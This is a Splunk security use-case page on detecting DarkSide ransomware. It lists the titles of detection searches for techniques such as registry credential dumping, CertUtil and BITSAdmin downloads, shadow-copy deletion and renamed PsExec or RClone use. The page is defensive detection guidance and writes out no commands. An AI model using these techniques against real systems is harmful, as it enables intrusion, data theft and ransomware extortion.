Detecting DarkSide ransomware
DarkSide ransomware presents users on targeted machines with a customized URI that contains their leaked information. The payload leaves machines at a minimum level of operation, only enough to browse the attackers' websites to gather required information to make payment to the attackers.
You are an analyst responsible for your organization's overall security posture. You need to be able to detect and investigate unusual activities that might relate to DarkSide ransomware, and these searches help you to do that.
Required data
How to use Splunk software for this use case
- Attempted credential dump from registry via reg exe
- BITSAdmin download file
- CertUtil download with URLCache and split arguments
- CertUtil download with VerifyCtl and split arguments
- Delete ShadowCopy with PowerShell
- Detect PsExec with accepteula flag
- Detect RClone command line usage
- Detect renamed PSExec
- Detect renamed RClone
- Extraction of registry hives
- SLUI run as elevated
- SLUI spawning a process
- Windows Bitsadmin download file
- Windows CertUtil URLCache download
- Windows CertUtil VerifyCtl download
The following searches require Sysmon:
Next steps
In addition, these Splunk resources might help you understand and implement this use case:Use case: Detecting ransomware attacks.
- Use case: Investigating ransomware attacks
- E-book: Ransomware, malware and cyberthreats
- Webinar: Detection of ransomware and prevention strategies
- Blog: Operationalize ransomware detections quickly and easily with Splunk